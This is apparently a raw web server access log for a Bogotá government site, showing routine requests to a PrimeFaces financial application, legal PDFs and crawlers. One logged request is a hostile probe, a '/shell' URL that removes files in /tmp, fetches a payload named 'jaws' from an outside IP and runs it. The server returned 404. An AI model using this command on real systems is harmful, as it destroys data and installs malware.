186.84.22.63 - - [11/Feb/2023:10:34:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:34:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:34:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:34:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:34:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [11/Feb/2023:10:33:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
79.110.73.35 - - [11/Feb/2023:10:34:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0272.pdf HTTP/1.1" 200 400733
173.252.107.12 - - [11/Feb/2023:10:35:13 -0500] "GET /crisis-climatica-distrito-firmo-alianza-para-preservar-la-seguridad-hidrica-de-bogota-y-la-region.html HTTP/1.1" 206 1075
201.245.192.253 - - [11/Feb/2023:10:35:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.80.234.110 - - [11/Feb/2023:10:35:41 -0500] "GET /sipsesda/faces/vista/sistema/cargarMenu.jspx?accionMenu=filtroConsultaResponsable&menuID=141 HTTP/1.1" 200 28202
186.80.234.110 - - [11/Feb/2023:10:35:41 -0500] "POST /sipsesda/faces/vista/sistema/cargarMenu.jspx HTTP/1.1" 200 37495
157.55.39.82 - - [11/Feb/2023:10:35:57 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
207.46.13.10 - - [11/Feb/2023:10:36:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0459.pdf HTTP/1.1" 200 415469
52.167.144.97 - - [11/Feb/2023:10:36:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438284
172.22.2.4 - - [11/Feb/2023:10:36:58 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [11/Feb/2023:10:37:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [11/Feb/2023:10:37:04 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [11/Feb/2023:10:36:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
186.80.234.110 - - [11/Feb/2023:10:37:27 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 37783
186.80.234.110 - - [11/Feb/2023:10:37:27 -0500] "GET /sipsesda/faces/__ADFv__?_afPfm=1&_t=fred&_vir=/vista/administracion/funcionario/consultarFuncionarioPopup.jspx&loc=es-CO&_minWidth=600&_minHeight=700&_rtrnId=0 HTTP/1.1" 200 1059
186.80.234.110 - - [11/Feb/2023:10:37:27 -0500] "GET /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2&loc=es-CO HTTP/1.1" 200 31738
172.22.2.4 - - [11/Feb/2023:10:37:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.80.234.110 - - [11/Feb/2023:10:37:34 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2 HTTP/1.1" 200 32419
186.80.234.110 - - [11/Feb/2023:10:37:36 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2 HTTP/1.1" 200 101
186.80.234.110 - - [11/Feb/2023:10:37:36 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 27757
186.80.234.110 - - [11/Feb/2023:10:37:39 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 37799
186.80.234.110 - - [11/Feb/2023:10:37:44 -0500] "GET /sipsesda/faces/vista/sistema/cargarMenu.jspx?accionMenu=listadoFuncionario&menuID=18 HTTP/1.1" 200 28315
186.80.234.110 - - [11/Feb/2023:10:37:44 -0500] "POST /sipsesda/faces/vista/sistema/cargarMenu.jspx HTTP/1.1" 200 32097
186.80.234.110 - - [11/Feb/2023:10:37:48 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 32562
186.80.234.110 - - [11/Feb/2023:10:37:51 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 17667
157.55.39.142 - - [11/Feb/2023:10:37:59 -0500] "GET /bla/resoluciones/autos%202021/0801.pdf HTTP/1.1" 200 1330448
186.80.234.110 - - [11/Feb/2023:10:38:04 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/registrarFuncionario.jspx?_afPfm=1 HTTP/1.1" 200 32621
186.80.234.110 - - [11/Feb/2023:10:38:10 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 200 32097
186.80.234.110 - - [11/Feb/2023:10:38:11 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/listadoFuncionario.jspx HTTP/1.1" 302 201
216.245.221.92 - - [11/Feb/2023:10:38:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:10:38:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40500
201.245.192.253 - - [11/Feb/2023:10:38:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41718
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19356
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.22.63 - - [11/Feb/2023:10:38:41 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:38:51 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 197019
186.84.22.63 - - [11/Feb/2023:10:38:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:38:53 -0500] "GET /sipsesda/ HTTP/1.1" 200 1477
186.80.234.110 - - [11/Feb/2023:10:38:53 -0500] "GET /css/segobdis.css HTTP/1.1" 404 1264
186.80.234.110 - - [11/Feb/2023:10:38:53 -0500] "GET /sipsesda/faces/login.jspx HTTP/1.1" 200 6587
186.80.234.110 - - [11/Feb/2023:10:39:01 -0500] "POST /sipsesda/faces/login.jspx HTTP/1.1" 200 5285
186.84.22.63 - - [11/Feb/2023:10:39:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6206
186.84.22.63 - - [11/Feb/2023:10:39:11 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 61787
186.84.22.63 - - [11/Feb/2023:10:39:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:39:16 -0500] "POST /sipsesda/faces/vista/sistema/seleccionRol.jspx HTTP/1.1" 200 27995
186.84.22.63 - - [11/Feb/2023:10:39:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:39:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.80.234.110 - - [11/Feb/2023:10:39:22 -0500] "GET /sipsesda/faces/vista/sistema/cargarMenu.jspx?accionMenu=filtroConsultaResponsable&menuID=141 HTTP/1.1" 200 28202
186.80.234.110 - - [11/Feb/2023:10:39:23 -0500] "POST /sipsesda/faces/vista/sistema/cargarMenu.jspx HTTP/1.1" 200 37495
186.80.234.110 - - [11/Feb/2023:10:39:27 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 37783
186.80.234.110 - - [11/Feb/2023:10:39:27 -0500] "GET /sipsesda/faces/__ADFv__?_afPfm=1&_t=fred&_vir=/vista/administracion/funcionario/consultarFuncionarioPopup.jspx&loc=es-CO&_minWidth=600&_minHeight=700&_rtrnId=0 HTTP/1.1" 200 1059
186.80.234.110 - - [11/Feb/2023:10:39:27 -0500] "GET /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2&loc=es-CO HTTP/1.1" 200 31738
186.80.234.110 - - [11/Feb/2023:10:39:33 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2 HTTP/1.1" 200 32410
186.80.234.110 - - [11/Feb/2023:10:39:37 -0500] "POST /sipsesda/faces/vista/administracion/funcionario/consultarFuncionarioPopup.jspx?_afPfm=2 HTTP/1.1" 200 101
186.80.234.110 - - [11/Feb/2023:10:39:37 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 27763
186.80.234.110 - - [11/Feb/2023:10:39:38 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 200 41814
172.22.2.4 - - [11/Feb/2023:10:38:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:10:40:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [11/Feb/2023:10:38:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
173.252.95.2 - - [11/Feb/2023:10:41:40 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
40.77.167.251 - - [11/Feb/2023:10:42:35 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [11/Feb/2023:10:43:17 -0500] "HEAD / HTTP/1.1" 200 -
186.155.43.37 - - [11/Feb/2023:10:43:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 67342
186.155.43.37 - - [11/Feb/2023:10:43:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:43:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:43:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:43:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:43:48 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.155.43.37 - - [11/Feb/2023:10:43:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.155.43.37 - - [11/Feb/2023:10:43:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 52648
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12503
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.80.234.110 - - [11/Feb/2023:10:43:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=6eVabiAxikqweSzJCky8d-Lr.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.80.234.110 - - [11/Feb/2023:10:44:00 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
157.55.39.64 - - [11/Feb/2023:10:44:09 -0500] "-" 408 -
186.155.43.37 - - [11/Feb/2023:10:44:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 153994
186.155.43.37 - - [11/Feb/2023:10:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:44:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.43.37 - - [11/Feb/2023:10:44:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:44:49 -0500] "POST /sipsesda/faces/vista/financiero/solicitudProceso/filtroConsultaResponsable.jspx HTTP/1.1" 302 201
201.245.192.253 - - [11/Feb/2023:10:45:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
193.43.146.49 - - [11/Feb/2023:10:45:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/5341.pdf HTTP/1.1" 200 370752
193.43.146.49 - - [11/Feb/2023:10:45:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/6225.pdf HTTP/1.1" 200 382668
193.43.146.49 - - [11/Feb/2023:10:45:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/5881.pdf HTTP/1.1" 200 427429
207.46.13.10 - - [11/Feb/2023:10:45:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/4152.pdf HTTP/1.1" 200 390904
172.22.2.4 - - [11/Feb/2023:10:43:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.234.110 - - [11/Feb/2023:10:45:37 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11147
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:38 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.80.234.110 - - [11/Feb/2023:10:45:42 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5581
186.80.234.110 - - [11/Feb/2023:10:45:43 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17516
186.80.234.110 - - [11/Feb/2023:10:45:43 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:44 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.80.234.110 - - [11/Feb/2023:10:45:44 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.234.110 - - [11/Feb/2023:10:45:44 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.80.234.110 - - [11/Feb/2023:10:45:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.80.234.110 - - [11/Feb/2023:10:45:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 5029
186.80.234.110 - - [11/Feb/2023:10:45:49 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 43209
186.80.234.110 - - [11/Feb/2023:10:45:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.234.110 - - [11/Feb/2023:10:45:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12912
220.120.233.118 - - [11/Feb/2023:10:46:02 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
186.80.234.110 - - [11/Feb/2023:10:46:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12920
186.155.43.37 - - [11/Feb/2023:10:46:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
172.22.2.4 - - [11/Feb/2023:10:44:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
52.167.144.49 - - [11/Feb/2023:10:46:38 -0500] "GET /bla/resoluciones/autos%202021/2589.pdf HTTP/1.1" 200 370240
173.252.83.15 - - [11/Feb/2023:10:46:38 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
186.84.22.63 - - [11/Feb/2023:10:46:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31310
186.80.234.110 - - [11/Feb/2023:10:46:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12839
173.252.83.120 - - [11/Feb/2023:10:46:44 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
186.84.22.63 - - [11/Feb/2023:10:46:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23172
186.84.22.63 - - [11/Feb/2023:10:46:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 141774
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.22.63 - - [11/Feb/2023:10:46:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
